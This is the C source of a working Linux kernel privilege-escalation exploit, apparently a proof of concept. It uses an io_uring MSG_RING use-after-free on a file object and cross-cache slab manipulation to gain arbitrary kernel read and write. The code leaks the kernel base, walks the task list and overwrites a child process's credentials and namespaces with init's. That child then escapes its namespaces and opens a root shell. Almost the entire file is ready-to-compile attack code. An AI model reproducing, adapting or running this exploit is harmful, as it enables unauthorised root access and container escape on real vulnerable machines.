// gcc sploit.c -o sploit -l:liburing.a -static -Wall
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <stdarg.h>
#include <stdint.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/msg.h>
#include <sys/timerfd.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include "liburing.h"
// /sys/kernel/slab/filp/objs_per_slab
#define OBJS_PER_SLAB 16UL
// /sys/kernel/slab/filp/cpu_partial
#define CPU_PARTIAL 52UL
// Multiplier for cross-cache arithmetic
#define OVERFLOW_FACTOR 2UL
// Largest number of objects we could allocate per Cross-cache step
#define CROSS_CACHE_MAX 8192UL
// Fixed mapping in cpu_entry_area whose contents is NULL
#define NULL_MEM 0xfffffe0000002000UL
// Reading side of pipe
#define PIPE_READ 0
// Writing side of pipe
#define PIPE_WRITE 1
// error_entry inside cpu_entry_area pointer
#define ERROR_ENTRY_ADDR 0xfffffe0000002f48UL
// Offset from `error_entry` pointer to kernel base
#define EE_OFF 0xe0124dUL
// Kernel text signature
#define KERNEL_SIGNATURE 0x4801803f51258d48UL
// Offset from kernel base to init_task
#define INIT_OFF 0x18149c0UL
// Offset from task to task->comm
#define COMM_OFF 0x738UL
// Offset from task to task->real_cred
#define REAL_CRED_OFF 0x720UL
// Offset from task to task->cred
#define CRED_OFF 0x728UL
// Offset from task to task->nsproxy
#define NSPROXY_OFF 0x780UL
// Offset from task to task->files
#define FILES_OFF 0x770UL
// Offset from task->files to &task->files->fdt
#define FDT_OFF 0x20UL
// Offset from &task->files->fdt to &task->files->fdt->fd
#define FD_ARRAY_OFF 0x8UL
// Offset from task to task->tasks.next
#define TASKS_NEXT_OFF 0x458UL
// Process name to give root creds to
#define TARGET_TASK "blegh2"
// Our process name
#define OUR_TASK "blegh1"
// Offset from kernel base to io_uring_fops
#define FOPS_OFF 0x1220200UL
// Shared memory with child
void *g_shmem;
// Child pid
pid_t g_child = -1;
// io_uring instance to use
struct io_uring g_ring = { 0 };
// UAF file handle
int g_uaf_fd = -1;
// Track pipes
struct fd_pair {
    int fd[2];
};
struct fd_pair g_pipe = { 0 };
// The offset on the page where our `file` is
size_t g_off = 0;
// Our fake file that is a copy of a legit io_uring fd
unsigned char g_ring_copy[256] = { 0 };
// Keep track of files added in Cross-cache steps
int g_cc1_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc1_num = 0;
int g_cc2_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc2_num = 0;
int g_cc3_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc3_num = 0;
// Gadgets and offsets
uint64_t g_kern_base = 0;
uint64_t g_init_task = 0;
uint64_t g_target_task = 0;
uint64_t g_our_task = 0;
uint64_t g_cred_what = 0;
uint64_t g_nsproxy_what = 0;
uint64_t g_cred_where = 0;
uint64_t g_real_cred_where = 0;
uint64_t g_nsproxy_where = 0;
uint64_t g_files = 0;
uint64_t g_fdt = 0;
uint64_t g_file_array = 0;
uint64_t g_file_addr = 0;
uint64_t g_pipe_buf = 0;
uint64_t g_scratch = 0;
uint64_t g_fops = 0;
void err(const char* format, ...)
{
    if (!format) {
        exit(EXIT_FAILURE);
    }

    fprintf(stderr, "%s", "[!] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, ": %s\n", strerror(errno));

    sleep(5);
    exit(EXIT_FAILURE);
}

void info(const char* format, ...)
{
    if (!format) {
        return;
    }

    fprintf(stderr, "%s", "[*] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, "%s", "\n");
}
// Get FD for test file
int get_test_fd(int victim)
{
    // These are just different for kernel debugging purposes
    char *file = NULL;
    if (victim) { file = "/etc//passwd"; }
    else { file = "/etc/passwd"; }

    int fd = open(file, O_RDONLY);
    if (fd < 0)
    {
        err("`open()` failed, file: %s", file);
    }

    return fd;
}
// Set-up the file that we're going to use as our victim object
void alloc_victim_filp(void)
{
    // Open file to register
    g_uaf_fd = get_test_fd(1);
    info("Victim fd: %d", g_uaf_fd);

    // Register the file
    int ret = io_uring_register_files(&g_ring, &g_uaf_fd, 1);
    if (ret)
    {
        err("`io_uring_register_files()` failed");
    }

    // Get hold of the sqe
    struct io_uring_sqe *sqe = NULL;
    sqe = io_uring_get_sqe(&g_ring);
    if (!sqe)
    {
        err("`io_uring_get_sqe()` failed");
    }

    // Init sqe vals
    sqe->opcode = IORING_OP_MSG_RING;
    sqe->fd = 0;
    sqe->flags |= IOSQE_FIXED_FILE;

    ret = io_uring_submit(&g_ring);
    if (ret < 0)
    {
        err("`io_uring_submit()` failed");
    }

    // Wait for the request to complete (this is where the buggy put happens)
    struct io_uring_cqe *cqe;
    ret = io_uring_wait_cqe(&g_ring, &cqe);
}
// Set CPU affinity for calling process/thread
void pin_cpu(long cpu_id)
{
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(cpu_id, &mask);
    if (sched_setaffinity(0, sizeof(mask), &mask) == -1)
    {
        // err() already appends strerror(errno)
        err("`sched_setaffinity()` failed");
    }

    return;
}
// Increase the number of FDs we can have open
void increase_fds(void)
{
struct rlimit old_lim, lim;
if (getrlimit(RLIMIT_NOFILE, &old_lim) != 0)
{
err("`getrlimit()` failed");
}
lim.rlim_cur = old_lim.rlim_max;
lim.rlim_max = old_lim.rlim_max;
if (setrlimit(RLIMIT_NOFILE, &lim) != 0)
{
err("`setrlimit()` failed");
}
info("Increased fd limit from %lu to %lu",
(unsigned long)old_lim.rlim_cur, (unsigned long)lim.rlim_cur);
return;
}
void create_pipe(void)
{
if (pipe(g_pipe.fd) == -1)
{
err("`pipe()` failed");
}
}
void release_pipe(void)
{
close(g_pipe.fd[PIPE_WRITE]);
close(g_pipe.fd[PIPE_READ]);
}
// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
// Change our taskname
if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
{
err("`prctl()` failed");
}
while (1)
{
if (*(int *)g_shmem == 0x1337)
{
sleep(3);
info("Child dropping into root shell...");
if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
char *args[] = {"/bin/sh", NULL, NULL};
execve(args[0], args, NULL);
}
else { sleep(2); }
}
}
// Set-up environment for exploit
void setup_env(void)
{
// Make sure a page is a page and we're not on some bullshit machine
long page_sz = sysconf(_SC_PAGESIZE);
if (page_sz != 4096L)
{
err("Page size was: %ld", page_sz);
}
// Pin to CPU 0
pin_cpu(0);
info("Pinned process to core-0");
// Increase FD limit
increase_fds();
// Create shared mem
g_shmem = mmap(
(void *)0x1337000,
page_sz,
PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_FIXED | MAP_SHARED,
-1,
0
);
if (g_shmem == MAP_FAILED) { err("`mmap()` failed"); }
info("Shared memory @ %p", (void *)g_shmem);
// Create child
g_child = fork();
if (g_child == -1)
{
err("`fork()` failed");
}
// Child
if (g_child == 0)
{
child_exec();
}
info("Spawned child: %d", g_child);
// Change our name
if (prctl(PR_SET_NAME, OUR_TASK, NULL, NULL, NULL) != 0)
{
err("`prctl()` failed");
}
// Create io ring
struct io_uring_params params = { 0 };
if (io_uring_queue_init_params(8, &g_ring, &params))
{
err("`io_uring_queue_init_params()` failed");
}
info("Created io_uring");
// Create pipe
info("Creating pipe...");
create_pipe();
}
// Decrement file->f_count to 0 and free the filp
void do_uaf(void)
{
if (io_uring_unregister_files(&g_ring))
{
err("`io_uring_unregister_files()` failed");
}
// Let the free actually happen
usleep(100000);
}
// Cross-cache 1:
// Allocate enough objects that we have definitely allocated enough
// slabs to fill up the partial list later when we free an object from each
// slab
void cc_1(void)
{
// Calculate the amount of objects to spray
uint64_t spray_amt = (OBJS_PER_SLAB * (CPU_PARTIAL + 1)) * OVERFLOW_FACTOR;
g_cc1_num = spray_amt;
// Paranoid
if (spray_amt > CROSS_CACHE_MAX) { err("Illegal spray amount"); }
//info("Spraying %lu `filp` objects...", spray_amt);
for (uint64_t i = 0; i < spray_amt; i++)
{
g_cc1_fds[i] = get_test_fd(0);
}
usleep(100000);
return;
}
// Cross-cache 2:
// Allocate OBJS_PER_SLAB - 1 objects to *probably* create a new active slab.
// The victim filp is allocated right after this step
void cc_2(void)
{
uint64_t spray_amt = OBJS_PER_SLAB - 1;
g_cc2_num = spray_amt;
//info("Spraying %lu `filp` objects...", spray_amt);
for (uint64_t i = 0; i < spray_amt; i++)
{
g_cc2_fds[i] = get_test_fd(0);
}
usleep(100000);
return;
}
// Cross-cache 3:
// Allocate enough objects to definitely fill the rest of the active slab
// and start a new active slab
void cc_3(void)
{
uint64_t spray_amt = OBJS_PER_SLAB + 1;
g_cc3_num = spray_amt;
//info("Spraying %lu `filp` objects...", spray_amt);
for (uint64_t i = 0; i < spray_amt; i++)
{
g_cc3_fds[i] = get_test_fd(0);
}
usleep(100000);
return;
}
// Cross-cache 4:
// Free all the filps from steps 2 and 3. This will place our victim
// page in the partial list, completely empty
void cc_4(void)
{
//info("Freeing `filp` objects from CC2 and CC3...");
for (size_t i = 0; i < g_cc2_num; i++)
{
close(g_cc2_fds[i]);
}
for (size_t i = 0; i < g_cc3_num; i++)
{
close(g_cc3_fds[i]);
}
usleep(100000);
return;
}
// Cross-cache 5:
// Free an object for each slab we allocated in Step 1 to overflow the
// partial list and get our empty slab in the partial list freed
void cc_5(void)
{
//info("Freeing `filp` objects to overflow CPU partial list...");
for (size_t i = 0; i < g_cc1_num; i++)
{
if (i % OBJS_PER_SLAB == 0)
{
close(g_cc1_fds[i]);
}
}
usleep(100000);
return;
}
// Reset all state associated with a cross-cache attempt
void cc_reset(void)
{
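// Close all the FDs we opened during this attempt (the ones we already
// closed just return EBADF). Only walk the entries we actually filled in so
// that we never call `close()` on an unused slot
info("Resetting cross-cache state...");
for (size_t i = 0; i < g_cc1_num; i++) { close(g_cc1_fds[i]); }
for (size_t i = 0; i < g_cc2_num; i++) { close(g_cc2_fds[i]); }
for (size_t i = 0; i < g_cc3_num; i++) { close(g_cc3_fds[i]); }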
// Reset number trackers
g_cc1_num = 0;
g_cc2_num = 0;
g_cc3_num = 0;
}
// Do cross cache process
void do_cc(void)
{
// Start cross-cache process
cc_1();
cc_2();
// Allocate the victim filp
alloc_victim_filp();
// Free the victim filp
do_uaf();
// Resume cross-cache process
cc_3();
cc_4();
cc_5();
// Allow pages to be freed
usleep(100000);
}
void reset_pipe_buf(void)
{
char buf[4096] = { 0 };
read(g_pipe.fd[PIPE_READ], buf, 4096);
}
void zero_pipe_buf(void)
{
char buf[4096] = { 0 };
write(g_pipe.fd[PIPE_WRITE], buf, 4096);
}
// Offset inside of inode to inode->i_write_hint
#define HINT_OFF 0x8fUL
// By using `fcntl(F_GET_RW_HINT)` we can read a single byte at
// file->inode->i_write_hint
uint64_t read_8_at(unsigned long addr)
{
// Set the inode address
uint64_t inode_addr_base = addr - HINT_OFF;
// Set up the buffer for the arbitrary read
unsigned char buf[4096] = { 0 };
// Iterate 8 times to read 8 bytes
uint64_t val = 0;
for (size_t i = 0; i < 8; i++)
{
// Calculate inode address
uint64_t target = inode_addr_base + i;
// Set up a fake file 16 times (number of files per page), we don't know
// yet which of the 16 slots our UAF file is at
reset_pipe_buf();
// Each fake file slot is 0x100 bytes; the inode pointer sits at +0x20
for (size_t slot = 0; slot < 16; slot++)
{
*(uint64_t *)&buf[(slot * 0x100) + 0x20] = target;
}
// Create the content
write(g_pipe.fd[PIPE_WRITE], buf, 4096);
// Read one byte back
uint64_t arg = 0;
if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
{
err("`fcntl()` failed");
};
// Add to val
val |= (arg << (i * 8));
}
return val;
}
void read_comm_at(unsigned long addr, char *comm)
{
// Set the inode address
uint64_t inode_addr_base = addr - HINT_OFF;
// Set up the buffer for the arbitrary read
unsigned char buf[4096] = { 0 };
// Iterate 8 times to read the first 8 bytes of comm
for (size_t i = 0; i < 8; i++)
{
// Calculate inode address
uint64_t target = inode_addr_base + i;
// Set up a fake file 16 times (number of files per page), we don't know
// yet which of the 16 slots our UAF file is at
reset_pipe_buf();
// Each fake file slot is 0x100 bytes; the inode pointer sits at +0x20
for (size_t slot = 0; slot < 16; slot++)
{
*(uint64_t *)&buf[(slot * 0x100) + 0x20] = target;
}
// Create the content
write(g_pipe.fd[PIPE_WRITE], buf, 4096);
// Read one byte back
uint64_t arg = 0;
if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
{
err("`fcntl()` failed");
};
// Add to comm buf
comm[i] = arg;
}
}
void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
// Copy in our saved copy of the real ring's struct file
memcpy(&buf[g_off], g_ring_copy, 256);
// Set f->f_count to 1
uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
*count = 1;
// Set f->private_data to our scratch space
uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
*private_data = g_scratch;
// Set ctx->cqe_cached
size_t cqe_cached = g_scratch + 0x240;
cqe_cached &= 0xFFF;
uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
*cached_ptr = NULL_MEM;
// Set ctx->cqe_sentinel
size_t cqe_sentinel = g_scratch + 0x248;
cqe_sentinel &= 0xFFF;
uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];
// We need ctx->cqe_cached < ctx->cqe_sentinel
*sentinel_ptr = NULL_MEM + 1;
// Set ctx->rings so that the write to ctx->rings->cq.tail lands on `where`.
// cq.tail is at offset 0xc0 from the rings base address
size_t rings = g_scratch + 0x10;
rings &= 0xFFF;
uint64_t *rings_ptr = (uint64_t *)&buf[rings];
*rings_ptr = where - 0xc0;
// Set ctx->cached_cq_tail which is our what
size_t cq_tail = g_scratch + 0x250;
cq_tail &= 0xFFF;
uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
*cq_tail_ptr = what;
// Point the ctx->cq_wait list head at itself (so that it's "empty")
size_t real_cq_wait = g_scratch + 0x268;
size_t cq_wait = (real_cq_wait & 0xFFF);
uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
*cq_wait_ptr = real_cq_wait;
}
void write_what_where(uint32_t what, uint64_t where)
{
// Reset the page contents
reset_pipe_buf();
// Setup the fake file target ctx
char buf[4096] = { 0 };
write_setup_ctx(buf, what, where);
// Set contents
write(g_pipe.fd[PIPE_WRITE], buf, 4096);
// Get an sqe
struct io_uring_sqe *sqe = NULL;
sqe = io_uring_get_sqe(&g_ring);
if (!sqe)
{
err("`io_uring_get_sqe()` failed");
}
// Set values
sqe->opcode = IORING_OP_MSG_RING;
sqe->fd = g_uaf_fd;
int ret = io_uring_submit(&g_ring);
if (ret < 0)
{
err("`io_uring_submit()` failed");
}
// Wait for the completion
struct io_uring_cqe *cqe;
ret = io_uring_wait_cqe(&g_ring, &cqe);
}
// In this kernel code path, the what value gets incremented (++ style) as
// part of our write-what-where, so we have to pass each value minus one.
// Also, we only have a 4-byte write ability, so we have to split each 8-byte
// value into 2 separate writes (low half first, then the high half at +4)
void overwrite_cred(void)
{
uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;
write_what_where(val_1 - 1, g_cred_where);
write_what_where(val_2 - 1, g_cred_where + 0x4);
}
void overwrite_real_cred(void)
{
uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;
write_what_where(val_1 - 1, g_real_cred_where);
write_what_where(val_2 - 1, g_real_cred_where + 0x4);
}
void overwrite_nsproxy(void)
{
uint32_t val_1 = g_nsproxy_what & 0xFFFFFFFF;
uint32_t val_2 = (g_nsproxy_what >> 32) & 0xFFFFFFFF;
write_what_where(val_1 - 1, g_nsproxy_where);
write_what_where(val_2 - 1, g_nsproxy_where + 0x4);
}
// Try to fuzzily validate leaked task addresses lol
int task_valid(uint64_t task)
{
if ((uint16_t)(task >> 48) == 0xFFFF) { return 1; }
else { return 0; }
}
void traverse_tasks(void)
{
// Process name buf
char current_comm[16] = { 0 };
// Get the next task after init
uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
uint64_t current = current_next - TASKS_NEXT_OFF;
if (!task_valid(current))
{
err("Invalid task after init: 0x%lx", current);
}
// Read the comm
read_comm_at(current + COMM_OFF, current_comm);
//printf(" - Address: 0x%lx, Name: '%s'\n", current, current_comm);
// While we don't have NULL, traverse the list
while (task_valid(current))
{
current_next = read_8_at(current_next);
current = current_next - TASKS_NEXT_OFF;
if (current == g_init_task) { break; }
// Read the comm
read_comm_at(current + COMM_OFF, current_comm);
//printf(" - Address: 0x%lx, Name: '%s'\n", current, current_comm);
// If we find the target comm, save it
if (!strcmp(current_comm, TARGET_TASK))
{
g_target_task = current;
}
// If we find our own comm, save it
if (!strcmp(current_comm, OUR_TASK))
{
g_our_task = current;
}
}
}
void find_pipe_buf_addr(void)
{
// Get the base of the files array
uint64_t files_ptr = read_8_at(g_file_array);
// Adjust the files_ptr to point to our fd in the array
files_ptr += (sizeof(uint64_t) * g_uaf_fd);
// Get the address of our UAF file struct
uint64_t curr_file = read_8_at(files_ptr);
// Calculate the offset
g_off = curr_file & 0xFFF;
// Set the globals
g_file_addr = curr_file;
g_pipe_buf = g_file_addr - g_off;
return;
}
void make_ring_copy(void)
{
// Get the base of the files array
uint64_t files_ptr = read_8_at(g_file_array);
// Adjust the files_ptr to point to our ring fd in the array
files_ptr += (sizeof(uint64_t) * g_ring.ring_fd);
// Get the address of our io_uring file struct
uint64_t curr_file = read_8_at(files_ptr);
// Copy all the data into the buffer
for (size_t i = 0; i < 32; i++)
{
uint64_t *val_ptr = (uint64_t *)&g_ring_copy[i * 8];
*val_ptr = read_8_at(curr_file + (i * 8));
}
}
// Here, all we're doing is determining which part of the page the UAF file is
// in: if it's in the first 0x500 bytes, the region starting at 0x500 is our
// scratch space, otherwise the start of the page is
void set_scratch_space(void)
{
g_scratch = g_pipe_buf;
if (g_off < 0x500) { g_scratch += 0x500; }
}
// The cross-cache stage failed (we didn't replace the UAF object), so tear
// down this attempt's state and get ready to retry
void cc_fail(void)
{
cc_reset();
close(g_uaf_fd);
g_uaf_fd = -1;
release_pipe();
create_pipe();
sleep(1);
}
void write_pipe(unsigned char *buf)
{
if (write(g_pipe.fd[PIPE_WRITE], buf, 4096) == -1)
{
err("`write()` failed");
}
}
int main(int argc, char *argv[])
{
info("Setting up exploit environment...");
setup_env();
// Create a debug buffer
unsigned char buf[4096] = { 0 };
memset(buf, 'A', 4096);
retry_cc:
// Do cross-cache attempt
info("Attempting cross-cache...");
do_cc();
// Replace UAF file (and page) with pipe page
write_pipe(buf);
// Try to `lseek()` which should fail if we succeeded
if (lseek(g_uaf_fd, 0, SEEK_SET) != -1)
{
printf("[!] Cross-cache failed, retrying...\n");
cc_fail();
goto retry_cc;
}
// Success
info("Cross-cache succeeded");
sleep(1);
// Leak the `error_entry` pointer
uint64_t error_entry = read_8_at(ERROR_ENTRY_ADDR);
info("Leaked `error_entry` address: 0x%lx", error_entry);
// Make sure it seems kernel-ish
if ((uint16_t)(error_entry >> 48) != 0xFFFF)
{
err("Weird `error_entry` address: 0x%lx", error_entry);
}
// Set kernel base
g_kern_base = error_entry - EE_OFF;
info("Kernel base: 0x%lx", g_kern_base);
// Read 8 bytes at that address and see if they match our signature
uint64_t sig = read_8_at(g_kern_base);
if (sig != KERNEL_SIGNATURE)
{
err("Bad kernel signature: 0x%lx", sig);
}
// Set init_task
g_init_task = g_kern_base + INIT_OFF;
info("init_task @ 0x%lx", g_init_task);
// Get the cred and nsproxy values
g_cred_what = read_8_at(g_init_task + CRED_OFF);
g_nsproxy_what = read_8_at(g_init_task + NSPROXY_OFF);
if ((uint16_t)(g_cred_what >> 48) != 0xFFFF)
{
err("Weird init->cred value: 0x%lx", g_cred_what);
}
if ((uint16_t)(g_nsproxy_what >> 48) != 0xFFFF)
{
err("Weird init->nsproxy value: 0x%lx", g_nsproxy_what);
}
info("init cred address: 0x%lx", g_cred_what);
info("init nsproxy address: 0x%lx", g_nsproxy_what);
// Traverse the tasks list
info("Traversing tasks linked list...");
traverse_tasks();
// Check to see if we succeeded
if (!g_target_task) { err("Unable to find target task!"); }
if (!g_our_task) { err("Unable to find our task!"); }
// We found the target task
info("Found '%s' task @ 0x%lx", TARGET_TASK, g_target_task);
info("Found '%s' task @ 0x%lx", OUR_TASK, g_our_task);
// Set the "where" addresses for our writes
g_cred_where = g_target_task + CRED_OFF;
g_real_cred_where = g_target_task + REAL_CRED_OFF;
g_nsproxy_where = g_target_task + NSPROXY_OFF;
info("Target cred @ 0x%lx", g_cred_where);
info("Target real_cred @ 0x%lx", g_real_cred_where);
info("Target nsproxy @ 0x%lx", g_nsproxy_where);
// Locate our file descriptor table
g_files = g_our_task + FILES_OFF;
g_fdt = read_8_at(g_files) + FDT_OFF;
g_file_array = read_8_at(g_fdt) + FD_ARRAY_OFF;
info("Our files @ 0x%lx", g_files);
info("Our file descriptor table @ 0x%lx", g_fdt);
info("Our file array @ 0x%lx", g_file_array);
// Find our pipe address
find_pipe_buf_addr();
info("UAF file addr: 0x%lx", g_file_addr);
info("Pipe buffer addr: 0x%lx", g_pipe_buf);
// Set the global scratch space side of the page
set_scratch_space();
info("Scratch space base @ 0x%lx", g_scratch);
// Make a copy of our real io_uring file descriptor since we need to fake
// one
info("Making copy of legitimate io_uring fd...");
make_ring_copy();
info("Copy done");
// Overwrite the target (child) task's cred with init's
info("Overwriting our cred with init's...");
overwrite_cred();
// Make sure it's correct
uint64_t check_cred = read_8_at(g_cred_where);
if (check_cred != g_cred_what)
{
err("check_cred: 0x%lx != g_cred_what: 0x%lx",
check_cred, g_cred_what);
}
// Overwrite the target (child) task's real_cred with init's cred
sleep(1);
info("Overwriting our real_cred with init's...");
overwrite_real_cred();
// Make sure it's correct
check_cred = read_8_at(g_real_cred_where);
if (check_cred != g_cred_what)
{
err("check_cred: 0x%lx != g_cred_what: 0x%lx", check_cred, g_cred_what);
}
// Overwrite the target (child) task's nsproxy with init's
sleep(1);
info("Overwriting our nsproxy with init's...");
overwrite_nsproxy();
// Make sure it's correct
check_cred = read_8_at(g_nsproxy_where);
if (check_cred != g_nsproxy_what)
{
err("check_nsproxy: 0x%lx != g_nsproxy_what: 0x%lx",
check_cred, g_nsproxy_what);
}
info("Creds and namespace look good!");
// Let the child loose
*(int *)g_shmem = 0x1337;
sleep(3000);
}